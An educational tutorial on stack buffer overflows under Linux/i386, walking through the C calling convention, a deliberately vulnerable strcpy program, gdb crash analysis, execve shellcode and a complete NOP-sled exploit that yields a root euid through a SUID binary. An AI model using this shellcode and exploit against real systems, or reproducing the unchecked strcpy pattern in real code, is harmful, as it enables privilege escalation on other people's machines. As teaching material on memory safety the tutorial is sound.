** UGLY DISCLAIMER BEGIN **
As always with texts describing security related issues this text is for information only. I am not responsible for anything illegal done with this. I have done what I could to make it less script kiddie happy though.
** UGLY DISCLAIMER END **
As you probably know, what a buffer overflow tries to do is simply to
write beyond a buffer on the stack so when the function returns it will
jump to some code that most often starts a shell instead of returning
to the function that called the current function.
To understand how it works you have to know how the stack works and
how functions are called in C.
The stack starts somewhere in the top of memory and the stack pointer
moves down as we push things on the stack and back up as we pop it off
again.
If we have a simple C function like:
% cat test.c
void myfunction(int a,int b)
{
int c = a+b;
}
gcc -S test.c gives the following assembly code for this function:
Line |
Instruction |
Description |
1 |
myfunction: |
|
2 |
pushl %ebp |
save the value of ebp on the stack |
3 |
movl %esp,%ebp |
copy the stack value to ebp |
4 |
subl $24,%esp |
make room for 24 bytes (only 4 needed) |
5 |
movl 8(%ebp),%eax |
read a |
6 |
movl 12(%ebp),%eax |
read b |
7 |
leal (%edx,%eax),%ecx |
fancy way of doing ecx = edx + eax |
8 |
leave |
short way do doing the opposite of line 2+3 |
9 |
ret |
pop return value off stack and jump to it |
In C functions are called according to the following:
- The caller pushes the parameters on the stack from right to left. So in this case b is first pushed on the stack and then a.
- The caller then executes a call instruction which pushes the address of the next instruction onto the stack and jumps to myfunction.
- The called function normally creates a stack frame using ebp (this is done so you can address using constant offsets to the parameters no matter how much you push and pop) - this is what we se in line 2, 3 and 8.
- There is made room for the local variables (in this case C). For some reason gcc reserves 20 bytes extra in this case.
- a and b is read, added and written to c.
- The stack is cleaned up and execution returns to the address saved in 2.
So in this case the stack looks like this inside myfunction:
b |
a |
<return address> |
<ebp> |
c |
What we want to do is to change the return address. This is not
possible to do in this case because no matter what a and b is the
result cannot overflow c into ebp and the return address. But if c was
a string instead we could write past it:
A little example:
% cat overflow.c
#include <stdio.h>
void copy_string(char *s)
{
char local[1024];
strcpy(local,s);
printf("string is %s\n",local);
}
int main(int argc, char *argv[])
{
myfunction(4,5);
copy_string(argv[1]);
}
So we have a function copy_string which makes a copy of the first
command line parameter of the program into a buffer of a fixed size
and then prints it out. This might look stupid but something like this
is quite common for programs that need to open files given on the
command line and such things.
If we compile and run it:
% gcc -o overflow overflow.c
% ./overflow 'Hello world!'
string is Hello world!
So everything is fine right? Lets see what happens when we call it
with a parameter longer than 1024 characters:
% ./overflow `perl -e 'print "a" x 2000'`
string is aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
zsh: segmentation fault (core dumped) ./overflow `perl -e 'print "a" x 2000'`
If you're not familiar with Perl the little script above generates
a string of 2000 a's.
You might have turned off generation of core files in your shell - if
so, then do a ulimit -c 100000 before running the program to enable it.
If we run our core file through gdb we get:
% gdb ./overflow core
GNU gdb 2002-04-01-cvs
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-linux".
Core was generated by `aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x61616161 in ?? ()
So we got a segmentation fault at address 0x61616161 - which is the
string 'aaaa' in hexidecimal.
Now we know that we can get the program to jump to an arbitrary
address depending on what we give it as parameter. What we would
really like to do is to make it jump to the beginning of our buffer
(local) which is placed on the stack - but what is the address of the
stack right now? Gdb can tell us that:
(gdb) info register esp
esp 0xbffff334 0xbffff334
This is all we need to know how to get our code executed.
Now we need some code to get executed. The most common code is code
which does an execve
(se man 2 execve) on /bin/sh (so called shellcode). This is fairly
easy to program if you know assembly programming but there's a few
things that you have to take into consideration:
- The code should be as short as possible as it has to fit in the buffer.
- Some programs check the string for various values, so there's certain byte values that shouldn't be used. An example of this can be seen in our copy_string function where we use strcpy to copy the parameter to local. Strcpy copys bytes from input to output until it finds a byte with the value 0, so if our shellcode contained a 0 the copy would stop there and our exploit wouldn't work.
- It must be able to run independently of what address it is loaded from, so it should use no absolute addresses (or we would have to change it for every program we wanted to exploit).
I'm not going to go into writing a piece of shellcode (a google search
for shellcode should give you plenty) - so I'm just going to use a
ready made one for linux/i386. Represented as a string it could look
like this:
static char shellcode[]=
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
"\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff/bin/id";
First we make sure it actually works by calling it directly:
% cat exploit1.c
static char shellcode[]=
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
"\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff/bin/id";
int main()
{
void (*code)() = (void (*)())shellcode;
code();
return 0;
}
% gcc -o exploit1 exploit1.c
% ./exploit1
uid=1000(jacmet) gid=1000(jacmet) groups=1000(jacmet),20(dialout),24(cdrom),29(audio),30(dip),44(video),102(plex86)
Good, so it works. Now we just need to put it into the parameter for
the program. That is most easily done through a little C program.
% cat exploit2.c
#include <stdlib.h>
static char shellcode[]=
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\"
"\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff/bin/id";
#define NOP 0x90
#define LEN 1024+8
#define RET 0xbffff334
int main()
{
char buffer[LEN]; int i;
/* first fill up the buffer with NOPs */
for (i=0;i<LEN;i++)
buffer[i] = NOP;
/* and then the shellcode */
memcpy(&buffer[LEN-strlen(shellcode)-4],shellcode,strlen(shellcode));
/* and finally the address to return to */
*(int*)(&buffer[LEN-4]) = RET;
/* run program with buffer as parameter */
execlp("./overflow","./overflow",buffer,NULL);
return 0;
}
We start with a buffer which is the size of the local variable (1024
bytes) + 8 bytes for ebp and the return address.
As the buffer is longer than our shellcode we fill up the beginning of
it with the do-nothing machine code (NOP), copy in the shellcode and
finally the address of the beginning of the buffer.
If we try to run it then we get:
% gcc -o exploit2 exploit2.c
string is <lots of garbage>
uid=1000(jacmet) gid=1000(jacmet) groups=1000(jacmet),20(dialout),24(cdrom),29(audio),30(dip),44(video),102(plex86)
Ok, so we did it. This is of cause not much fun as our overflow program
runs as my own user, but if it was a SUID root program then we would
now have a root shell.
We can easily try it out:
% chmod +s overflow
% sudo chown root overflow
% ./exploit2
uid=1000(jacmet) gid=1000(jacmet) euid=0(root) groups=1000(jacmet),20(dialout),24(cdrom),29(audio),30(dip),44(video),102(plex86)
And we have a root shell.
More advanced shellcode creates a listening socket and redirect
stdin/stdout to it before calling execve /bin/sh - that way you don't
need a shell account on the machine and can simply direct telnet or nc
at the machine/port to get a root shell.
This is basically it - if you have any questions regarding this article
feel free to send me an email.
A few links:
Security under Linux : the Buffer Overflow Problem:
http://www-miaif.lip6.fr/willy/security/linux.html
Win32 Buffer Overflows (Location, Exploitation and Prevention):
http://phrack.org/phrack/55/P55-15
http://www.phrack.org in general contains lots of
interesting technical information about computer security.
David A. Wheeler's Secure Programming for Linux and Unix HOWTO:
http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/index.html
Writing Buffer Overflow Exploits (the shellcode was taken from here):
http://packetstorm.linuxsecurity.com/mag/hackersdigest/digest_s_1.txt
Linux Assembly: (general assembly information)
http://www.linuxassembly.org/
|